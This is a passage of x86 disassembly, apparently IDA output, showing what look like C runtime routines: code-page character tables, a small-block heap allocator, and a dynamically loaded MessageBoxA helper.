loc_403B61: ; CODE XREF: sub_403AE6+42�j
push 0
lea eax, [ebp+var_514]
push ds:dword_407324
push ds:dword_407100
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 1
call sub_40371C
push 0
lea eax, [ebp+var_214]
push ds:dword_407100
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push esi
push ds:dword_407324
call sub_4046FE
push 0
lea eax, [ebp+var_314]
push ds:dword_407100
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 200h
push ds:dword_407324
call sub_4046FE
add esp, 5Ch
xor eax, eax
lea ecx, [ebp+var_514]
loc_403BDC: ; CODE XREF: sub_403AE6+135�j
mov dx, [ecx]
test dl, 1
jz short loc_403BFA
or ds:byte_407221[eax], 10h
mov dl, [ebp+eax+var_214]
loc_403BF2: ; CODE XREF: sub_403AE6+127�j
mov ds:byte_407120[eax], dl
jmp short loc_403C16
; ---------------------------------------------------------------------------
loc_403BFA: ; CODE XREF: sub_403AE6+FC�j
test dl, 2
jz short loc_403C0F
or ds:byte_407221[eax], 20h
mov dl, [ebp+eax+var_314]
jmp short loc_403BF2
; ---------------------------------------------------------------------------
loc_403C0F: ; CODE XREF: sub_403AE6+117�j
and ds:byte_407120[eax], 0
loc_403C16: ; CODE XREF: sub_403AE6+112�j
inc eax
inc ecx
inc ecx
cmp eax, esi
jb short loc_403BDC
jmp short loc_403C68
; ---------------------------------------------------------------------------
loc_403C1F: ; CODE XREF: sub_403AE6+1D�j
xor eax, eax
mov esi, 100h
loc_403C26: ; CODE XREF: sub_403AE6+180�j
cmp eax, 41h
jb short loc_403C44
cmp eax, 5Ah
ja short loc_403C44
or ds:byte_407221[eax], 10h
mov cl, al
add cl, 20h
loc_403C3C: ; CODE XREF: sub_403AE6+174�j
mov ds:byte_407120[eax], cl
jmp short loc_403C63
; ---------------------------------------------------------------------------
loc_403C44: ; CODE XREF: sub_403AE6+143�j
; sub_403AE6+148�j
cmp eax, 61h
jb short loc_403C5C
cmp eax, 7Ah
ja short loc_403C5C
or ds:byte_407221[eax], 20h
mov cl, al
sub cl, 20h
jmp short loc_403C3C
; ---------------------------------------------------------------------------
loc_403C5C: ; CODE XREF: sub_403AE6+161�j
; sub_403AE6+166�j
and ds:byte_407120[eax], 0
loc_403C63: ; CODE XREF: sub_403AE6+15C�j
inc eax
cmp eax, esi
jb short loc_403C26
loc_403C68: ; CODE XREF: sub_403AE6+137�j
pop esi
leave
retn
sub_403AE6 endp
; =============== S U B R O U T I N E =======================================
sub_403C6B proc near ; CODE XREF: sub_402D47+9�p
; sub_402D9F+D�p ...
cmp ds:dword_407448, 0
jnz short locret_403C86
push 0FFFFFFFDh
call sub_4038A7
pop ecx
mov ds:dword_407448, 1
locret_403C86: ; CODE XREF: sub_403C6B+7�j
retn
sub_403C6B endp
; =============== S U B R O U T I N E =======================================
sub_403C87 proc near ; CODE XREF: sub_402D9F+9D�p
; sub_4030A5+BF�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_403CB4
push esi
call sub_403D68
pop ecx
test eax, eax
push esi
jz short loc_403CA6
push eax
call sub_403D93
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_403CA6: ; CODE XREF: sub_403C87+13�j
push 0
push ds:dword_407328
call ds:dword_405084 ; RtlFreeHeap
loc_403CB4: ; CODE XREF: sub_403C87+7�j
pop esi
retn
sub_403C87 endp
; =============== S U B R O U T I N E =======================================
sub_403CB6 proc near ; CODE XREF: sub_402D9F+3A�p
; sub_402D9F+6F�p ...
arg_0 = dword ptr 4
push ds:dword_4070E0
push [esp+4+arg_0]
call sub_403CC8
pop ecx
pop ecx
retn
sub_403CB6 endp
; =============== S U B R O U T I N E =======================================
sub_403CC8 proc near ; CODE XREF: sub_403CB6+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFE0h
ja short loc_403CF1
loc_403CCF: ; CODE XREF: sub_403CC8+27�j
push [esp+arg_0]
call sub_403CF4
test eax, eax
pop ecx
jnz short locret_403CF3
cmp [esp+arg_4], eax
jz short locret_403CF3
push [esp+arg_0]
call sub_40494D
test eax, eax
pop ecx
jnz short loc_403CCF
loc_403CF1: ; CODE XREF: sub_403CC8+5�j
xor eax, eax
locret_403CF3: ; CODE XREF: sub_403CC8+13�j
; sub_403CC8+19�j
retn
sub_403CC8 endp
; =============== S U B R O U T I N E =======================================
sub_403CF4 proc near ; CODE XREF: sub_403CC8+B�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
cmp esi, ds:dword_406F28
ja short loc_403D0C
push esi
call sub_4040BE
test eax, eax
pop ecx
jnz short loc_403D28
loc_403D0C: ; CODE XREF: sub_403CF4+B�j
test esi, esi
jnz short loc_403D13
push 1
pop esi
loc_403D13: ; CODE XREF: sub_403CF4+1A�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push 0
push ds:dword_407328
call ds:dword_405060 ; RtlAllocateHeap
loc_403D28: ; CODE XREF: sub_403CF4+16�j
pop esi
retn
sub_403CF4 endp
; =============== S U B R O U T I N E =======================================
sub_403D2A proc near ; CODE XREF: sub_403382+20�p
push 140h
push 0
push ds:dword_407328
call ds:dword_405060 ; RtlAllocateHeap
test eax, eax
mov ds:dword_4070FC, eax
jnz short loc_403D47
retn
; ---------------------------------------------------------------------------
loc_403D47: ; CODE XREF: sub_403D2A+1A�j
and ds:dword_4070F4, 0
and ds:dword_4070F8, 0
push 1
mov ds:dword_4070F0, eax
mov ds:dword_4070E8, 10h
pop eax
retn
sub_403D2A endp
; =============== S U B R O U T I N E =======================================
sub_403D68 proc near ; CODE XREF: sub_403C87+A�p
arg_0 = dword ptr 4
mov eax, ds:dword_4070F8
lea ecx, [eax+eax*4]
mov eax, ds:dword_4070FC
lea ecx, [eax+ecx*4]
loc_403D78: ; CODE XREF: sub_403D68+26�j
cmp eax, ecx
jnb short loc_403D90
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_403D92
add eax, 14h
jmp short loc_403D78
; ---------------------------------------------------------------------------
loc_403D90: ; CODE XREF: sub_403D68+12�j
xor eax, eax
locret_403D92: ; CODE XREF: sub_403D68+21�j
retn
sub_403D68 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403D93 proc near ; CODE XREF: sub_403C87+16�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_0]
push ebx
push esi
mov eax, [ecx+10h]
mov esi, edx
sub esi, [ecx+0Ch]
mov ebx, [edx-4]
add edx, 0FFFFFFFCh
push edi
shr esi, 0Fh
mov ecx, esi
mov edi, [edx-4]
imul ecx, 204h
dec ebx
mov [ebp+var_4], edi
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ebx
mov [ebp+var_10], ecx
mov ecx, [ebx+edx]
test cl, 1
mov [ebp+var_8], ecx
jnz short loc_403E59
sar ecx, 4
push 3Fh
dec ecx
pop edi
mov [ebp+arg_4], ecx
cmp ecx, edi
jbe short loc_403DEB
mov [ebp+arg_4], edi
loc_403DEB: ; CODE XREF: sub_403D93+53�j
mov ecx, [ebx+edx+4]
cmp ecx, [ebx+edx+8]
jnz short loc_403E3D
mov ecx, [ebp+arg_4]
cmp ecx, 20h
jnb short loc_403E19
mov edi, 80000000h
shr edi, cl
lea ecx, [ecx+eax+4]
not edi
and [eax+esi*4+44h], edi
dec byte ptr [ecx]
jnz short loc_403E3D
mov ecx, [ebp+arg_0]
and [ecx], edi
jmp short loc_403E3D
; ---------------------------------------------------------------------------
loc_403E19: ; CODE XREF: sub_403D93+68�j
add ecx, 0FFFFFFE0h
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_4]
lea ecx, [ecx+eax+4]
not edi
and [eax+esi*4+0C4h], edi
dec byte ptr [ecx]
jnz short loc_403E3D
mov ecx, [ebp+arg_0]
and [ecx+4], edi
loc_403E3D: ; CODE XREF: sub_403D93+60�j
; sub_403D93+7D�j ...
mov ecx, [ebx+edx+8]
mov edi, [ebx+edx+4]
mov [ecx+4], edi
mov ecx, [ebx+edx+4]
mov edi, [ebx+edx+8]
add ebx, [ebp+var_8]
mov [ecx+8], edi
mov [ebp+var_C], ebx
loc_403E59: ; CODE XREF: sub_403D93+45�j
mov edi, ebx
sar edi, 4
dec edi
cmp edi, 3Fh
jbe short loc_403E67
push 3Fh
pop edi
loc_403E67: ; CODE XREF: sub_403D93+CF�j
mov ecx, [ebp+var_4]
and ecx, 1
mov [ebp+var_14], ecx
jnz loc_403F16
sub edx, [ebp+var_4]
mov ecx, [ebp+var_4]
sar ecx, 4
push 3Fh
mov [ebp+var_8], edx
dec ecx
pop edx
cmp ecx, edx
mov [ebp+arg_4], ecx
jbe short loc_403E92
mov [ebp+arg_4], edx
mov ecx, edx
loc_403E92: ; CODE XREF: sub_403D93+F8�j
add ebx, [ebp+var_4]
mov edi, ebx
mov [ebp+var_C], ebx
sar edi, 4
dec edi
cmp edi, edx
jbe short loc_403EA4
mov edi, edx
loc_403EA4: ; CODE XREF: sub_403D93+10D�j
cmp ecx, edi
jz short loc_403F13
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
cmp edx, [ecx+8]
jnz short loc_403EFB
mov ecx, [ebp+arg_4]
cmp ecx, 20h
jnb short loc_403ED7
mov edx, 80000000h
shr edx, cl
lea ecx, [ecx+eax+4]
not edx
and [eax+esi*4+44h], edx
dec byte ptr [ecx]
jnz short loc_403EFB
mov ecx, [ebp+arg_0]
and [ecx], edx
jmp short loc_403EFB
; ---------------------------------------------------------------------------
loc_403ED7: ; CODE XREF: sub_403D93+126�j
add ecx, 0FFFFFFE0h
mov edx, 80000000h
shr edx, cl
mov ecx, [ebp+arg_4]
lea ecx, [ecx+eax+4]
not edx
and [eax+esi*4+0C4h], edx
dec byte ptr [ecx]
jnz short loc_403EFB
mov ecx, [ebp+arg_0]
and [ecx+4], edx
loc_403EFB: ; CODE XREF: sub_403D93+11E�j
; sub_403D93+13B�j ...
mov ecx, [ebp+var_8]
mov edx, [ecx+8]
mov ecx, [ecx+4]
mov [edx+4], ecx
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
mov ecx, [ecx+8]
mov [edx+8], ecx
loc_403F13: ; CODE XREF: sub_403D93+113�j
mov edx, [ebp+var_8]
loc_403F16: ; CODE XREF: sub_403D93+DD�j
cmp [ebp+var_14], 0
jnz short loc_403F25
cmp [ebp+arg_4], edi
jz loc_403FAE
loc_403F25: ; CODE XREF: sub_403D93+187�j
mov ecx, [ebp+var_10]
lea ecx, [ecx+edi*8]
mov ecx, [ecx+4]
mov [edx+4], ecx
mov ecx, [ebp+var_10]
lea ecx, [ecx+edi*8]
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_403FAE
mov cl, [edi+eax+4]
cmp edi, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [edi+eax+4], cl
jnb short loc_403F82
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_403F71
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_403F71: ; CODE XREF: sub_403D93+1CE�j
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
lea eax, [eax+esi*4+44h]
or [eax], ebx
jmp short loc_403FAB
; ---------------------------------------------------------------------------
loc_403F82: ; CODE XREF: sub_403D93+1C8�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_403F98
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_403F98: ; CODE XREF: sub_403D93+1F3�j
lea ecx, [edi-20h]
mov edi, 80000000h
shr edi, cl
lea eax, [eax+esi*4+0C4h]
or [eax], edi
loc_403FAB: ; CODE XREF: sub_403D93+1ED�j
mov ebx, [ebp+var_C]
loc_403FAE: ; CODE XREF: sub_403D93+18C�j
; sub_403D93+1B6�j
mov eax, [ebp+var_10]
mov [edx], ebx
mov [ebx+edx-4], ebx
dec dword ptr [eax]
jnz loc_4040B9
mov eax, ds:dword_4070F4
test eax, eax
jz loc_4040AB
mov ecx, ds:dword_4070EC
mov edi, ds:dword_405088
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push 4000h
push ebx
push ecx
call edi ; VirtualFree
mov ecx, ds:dword_4070EC
mov eax, ds:dword_4070F4
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, ds:dword_4070F4
mov ecx, ds:dword_4070EC
mov eax, [eax+10h]
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, ds:dword_4070F4
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, ds:dword_4070F4
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_404039
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, ds:dword_4070F4
loc_404039: ; CODE XREF: sub_403D93+29B�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_4040AB
push ebx
push 0
push dword ptr [eax+0Ch]
call edi ; VirtualFree
mov eax, ds:dword_4070F4
push dword ptr [eax+10h]
push 0
push ds:dword_407328
call ds:dword_405084 ; RtlFreeHeap
mov eax, ds:dword_4070F8
mov edx, ds:dword_4070FC
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, ds:dword_4070F4
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_404970
mov eax, [ebp+arg_0]
add esp, 0Ch
dec ds:dword_4070F8
cmp eax, ds:dword_4070F4
jbe short loc_40409D
sub eax, 14h
loc_40409D: ; CODE XREF: sub_403D93+305�j
mov ecx, ds:dword_4070FC
mov ds:dword_4070F0, ecx
jmp short loc_4040AE
; ---------------------------------------------------------------------------
loc_4040AB: ; CODE XREF: sub_403D93+233�j
; sub_403D93+2AA�j
mov eax, [ebp+arg_0]
loc_4040AE: ; CODE XREF: sub_403D93+316�j
mov ds:dword_4070F4, eax
mov ds:dword_4070EC, esi
loc_4040B9: ; CODE XREF: sub_403D93+226�j
pop edi
pop esi
pop ebx
leave
retn
sub_403D93 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4040BE proc near ; CODE XREF: sub_403CF4+E�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov eax, ds:dword_4070F8
mov edx, ds:dword_4070FC
push ebx
push esi
lea eax, [eax+eax*4]
push edi
lea edi, [edx+eax*4]
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
lea ecx, [eax+17h]
and ecx, 0FFFFFFF0h
mov [ebp+var_10], ecx
sar ecx, 4
dec ecx
cmp ecx, 20h
jge short loc_4040FE
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
mov [ebp+var_C], esi
jmp short loc_40410E
; ---------------------------------------------------------------------------
loc_4040FE: ; CODE XREF: sub_4040BE+30�j
add ecx, 0FFFFFFE0h
or eax, 0FFFFFFFFh
xor esi, esi
shr eax, cl
mov [ebp+var_C], esi
mov [ebp+var_8], eax
loc_40410E: ; CODE XREF: sub_4040BE+3E�j
mov eax, ds:dword_4070F0
mov ebx, eax
cmp ebx, edi
mov [ebp+arg_0], ebx
jnb short loc_404135
loc_40411C: ; CODE XREF: sub_4040BE+75�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_404135
add ebx, 14h
cmp ebx, [ebp+var_4]
mov [ebp+arg_0], ebx
jb short loc_40411C
loc_404135: ; CODE XREF: sub_4040BE+5C�j
; sub_4040BE+6A�j
cmp ebx, [ebp+var_4]
jnz short loc_4041B3
mov ebx, edx
loc_40413C: ; CODE XREF: sub_4040BE+96�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_404158
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_404156
add ebx, 14h
jmp short loc_40413C
; ---------------------------------------------------------------------------
loc_404156: ; CODE XREF: sub_4040BE+91�j
cmp ebx, eax
loc_404158: ; CODE XREF: sub_4040BE+83�j
jnz short loc_4041B3
loc_40415A: ; CODE XREF: sub_4040BE+AD�j
cmp ebx, [ebp+var_4]
jnb short loc_404170
cmp dword ptr [ebx+8], 0
jnz short loc_40416D
add ebx, 14h
mov [ebp+arg_0], ebx
jmp short loc_40415A
; ---------------------------------------------------------------------------
loc_40416D: ; CODE XREF: sub_4040BE+A5�j
cmp ebx, [ebp+var_4]
loc_404170: ; CODE XREF: sub_4040BE+9F�j
jnz short loc_404198
mov ebx, edx
loc_404174: ; CODE XREF: sub_4040BE+C6�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_404188
cmp dword ptr [ebx+8], 0
jnz short loc_404186
add ebx, 14h
jmp short loc_404174
; ---------------------------------------------------------------------------
loc_404186: ; CODE XREF: sub_4040BE+C1�j
cmp ebx, eax
loc_404188: ; CODE XREF: sub_4040BE+BB�j
jnz short loc_404198
call sub_4043C7
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jz short loc_4041AC
loc_404198: ; CODE XREF: sub_4040BE:loc_404170�j
; sub_4040BE:loc_404188�j
push ebx
call sub_404478
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_4041B3
loc_4041AC: ; CODE XREF: sub_4040BE+D8�j
xor eax, eax
jmp loc_4043C2
; ---------------------------------------------------------------------------
loc_4041B3: ; CODE XREF: sub_4040BE+7A�j
; sub_4040BE:loc_404158�j ...
mov ds:dword_4070F0, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_4041DA
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_404211
loc_4041DA: ; CODE XREF: sub_4040BE+106�j
mov edx, [eax+0C4h]
mov esi, [eax+44h]
and edx, [ebp+var_8]
and esi, [ebp+var_C]
and [ebp+var_4], 0
lea ecx, [eax+44h]
or edx, esi
mov esi, [ebp+var_C]
jnz short loc_40420E
loc_4041F7: ; CODE XREF: sub_4040BE+14E�j
mov edx, [ecx+84h]
inc [ebp+var_4]
and edx, [ebp+var_8]
add ecx, 4
mov edi, esi
and edi, [ecx]
or edx, edi
jz short loc_4041F7
loc_40420E: ; CODE XREF: sub_4040BE+137�j
mov edx, [ebp+var_4]
loc_404211: ; CODE XREF: sub_4040BE+11A�j
mov ecx, edx
xor edi, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
and ecx, esi
jnz short loc_40423A
mov ecx, [eax+edx*4+0C4h]
push 20h
and ecx, [ebp+var_8]
pop edi
loc_40423A: ; CODE XREF: sub_4040BE+16D�j
; sub_4040BE+183�j
test ecx, ecx
jl short loc_404243
shl ecx, 1
inc edi
jmp short loc_40423A
; ---------------------------------------------------------------------------
loc_404243: ; CODE XREF: sub_4040BE+17E�j
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
mov [ebp+var_8], ecx
sar esi, 4
dec esi
cmp esi, 3Fh
jle short loc_404260
push 3Fh
pop esi
loc_404260: ; CODE XREF: sub_4040BE+19D�j
cmp esi, edi
jz loc_404375
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_4042D1
cmp edi, 20h
jge short loc_4042A0
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_4042CE
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx], ecx
jmp short loc_4042D1
; ---------------------------------------------------------------------------
loc_4042A0: ; CODE XREF: sub_4040BE+1B5�j
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
lea ecx, [eax+ecx*4+0C4h]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_4042CE
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_4042D1
; ---------------------------------------------------------------------------
loc_4042CE: ; CODE XREF: sub_4040BE+1D6�j
; sub_4040BE+203�j
mov ebx, [ebp+arg_0]
loc_4042D1: ; CODE XREF: sub_4040BE+1B0�j
; sub_4040BE+1E0�j ...
mov ecx, [edx+8]
mov edi, [edx+4]
cmp [ebp+var_8], 0
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_404381
mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [edx+4], edi
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_404372
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_0+3], cl
jge short loc_404343
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_404331
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_404331: ; CODE XREF: sub_4040BE+266�j
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_404372
; ---------------------------------------------------------------------------
loc_404343: ; CODE XREF: sub_4040BE+25A�j
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_40435C
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_40435C: ; CODE XREF: sub_4040BE+28F�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_404372: ; CODE XREF: sub_4040BE+24E�j
; sub_4040BE+283�j
mov ecx, [ebp+var_8]
loc_404375: ; CODE XREF: sub_4040BE+1A4�j
test ecx, ecx
jz short loc_404384
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_404384
; ---------------------------------------------------------------------------
loc_404381: ; CODE XREF: sub_4040BE+229�j
mov ecx, [ebp+var_8]
loc_404384: ; CODE XREF: sub_4040BE+2B9�j
; sub_4040BE+2C1�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_4043BA
cmp ebx, ds:dword_4070F4
jnz short loc_4043BA
mov ecx, [ebp+var_4]
cmp ecx, ds:dword_4070EC
jnz short loc_4043BA
and ds:dword_4070F4, 0
loc_4043BA: ; CODE XREF: sub_4040BE+2E0�j
; sub_4040BE+2E8�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_4043C2: ; CODE XREF: sub_4040BE+F0�j
pop edi
pop esi
pop ebx
leave
retn
sub_4040BE endp
; =============== S U B R O U T I N E =======================================
sub_4043C7 proc near ; CODE XREF: sub_4040BE+CC�p
mov eax, ds:dword_4070F8
mov ecx, ds:dword_4070E8
push esi
push edi
xor edi, edi
cmp eax, ecx
jnz short loc_40440A
lea eax, [ecx+ecx*4+50h]
shl eax, 2
push eax
push ds:dword_4070FC
push edi
push ds:dword_407328
call ds:dword_405058 ; RtlReAllocateHeap
cmp eax, edi
jz short loc_40445A
add ds:dword_4070E8, 10h
mov ds:dword_4070FC, eax
mov eax, ds:dword_4070F8
loc_40440A: ; CODE XREF: sub_4043C7+11�j
mov ecx, ds:dword_4070FC
push 41C4h
push 8
lea eax, [eax+eax*4]
push ds:dword_407328
lea esi, [ecx+eax*4]
call ds:dword_405060 ; RtlAllocateHeap
cmp eax, edi
mov [esi+10h], eax
jz short loc_40445A
push 4
push 2000h
push 100000h
push edi
call ds:dword_40505C ; VirtualAlloc
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_40445E
push dword ptr [esi+10h]
push edi
push ds:dword_407328
call ds:dword_405084 ; RtlFreeHeap
loc_40445A: ; CODE XREF: sub_4043C7+30�j
; sub_4043C7+67�j
xor eax, eax
jmp short loc_404475
; ---------------------------------------------------------------------------
loc_40445E: ; CODE XREF: sub_4043C7+81�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc ds:dword_4070F8
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_404475: ; CODE XREF: sub_4043C7+95�j
pop edi
pop esi
retn
sub_4043C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404478 proc near ; CODE XREF: sub_4040BE+DB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, [ecx+10h]
mov eax, [ecx+8]
xor ebx, ebx
loc_40448A: ; CODE XREF: sub_404478+19�j
test eax, eax
jl short loc_404493
shl eax, 1
inc ebx
jmp short loc_40448A
; ---------------------------------------------------------------------------
loc_404493: ; CODE XREF: sub_404478+14�j
mov eax, ebx
push 3Fh
imul eax, 204h
pop edx
lea eax, [eax+esi+144h]
mov [ebp+var_4], eax
loc_4044A8: ; CODE XREF: sub_404478+3A�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_4044A8
mov edi, ebx
push 4
shl edi, 0Fh
add edi, [ecx+0Ch]
push 1000h
push 8000h
push edi
call ds:dword_40505C ; VirtualAlloc
test eax, eax
jnz short loc_4044DB
or eax, 0FFFFFFFFh
jmp loc_40456E
; ---------------------------------------------------------------------------
loc_4044DB: ; CODE XREF: sub_404478+59�j
lea edx, [edi+7000h]
cmp edi, edx
ja short loc_404521
lea eax, [edi+10h]
loc_4044E8: ; CODE XREF: sub_404478+A7�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea ecx, [eax+0FFCh]
mov dword ptr [eax-4], 0FF0h
mov [eax], ecx
lea ecx, [eax-1004h]
mov [eax+4], ecx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
lea ecx, [eax-10h]
cmp ecx, edx
jbe short loc_4044E8
loc_404521: ; CODE XREF: sub_404478+6B�j
mov eax, [ebp+var_4]
lea ecx, [edi+0Ch]
add eax, 1F8h
push 1
pop edi
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_40455E
or [eax+4], edi
loc_40455E: ; CODE XREF: sub_404478+E1�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_40456E: ; CODE XREF: sub_404478+5E�j
pop edi
pop esi
pop ebx
leave
retn
sub_404478 endp
; =============== S U B R O U T I N E =======================================
sub_404573 proc near ; CODE XREF: sub_4035C9+11F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
xor ebx, ebx
cmp ds:dword_4070B0, ebx
push esi
push edi
jnz short loc_4045C2
push offset aUser32_dll ; "user32.dll"
call ds:dword_405014 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_4045F8
mov esi, ds:dword_405054
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi ; GetProcAddress
test eax, eax
mov ds:dword_4070B0, eax
jz short loc_4045F8
push offset aGetactivewindo ; "GetActiveWindow"
push edi
call esi ; GetProcAddress
push offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov ds:dword_4070B4, eax
call esi ; GetProcAddress
mov ds:dword_4070B8, eax
loc_4045C2: ; CODE XREF: sub_404573+B�j
mov eax, ds:dword_4070B4
test eax, eax
jz short loc_4045E1
call eax
mov ebx, eax
test ebx, ebx
jz short loc_4045E1
mov eax, ds:dword_4070B8
test eax, eax
jz short loc_4045E1
push ebx
call eax
mov ebx, eax
loc_4045E1: ; CODE XREF: sub_404573+56�j
; sub_404573+5E�j ...
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
push [esp+14h+arg_0]
push ebx
call ds:dword_4070B0
loc_4045F4: ; CODE XREF: sub_404573+87�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4045F8: ; CODE XREF: sub_404573+1C�j
; sub_404573+33�j
xor eax, eax
jmp short loc_4045F4
sub_404573 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
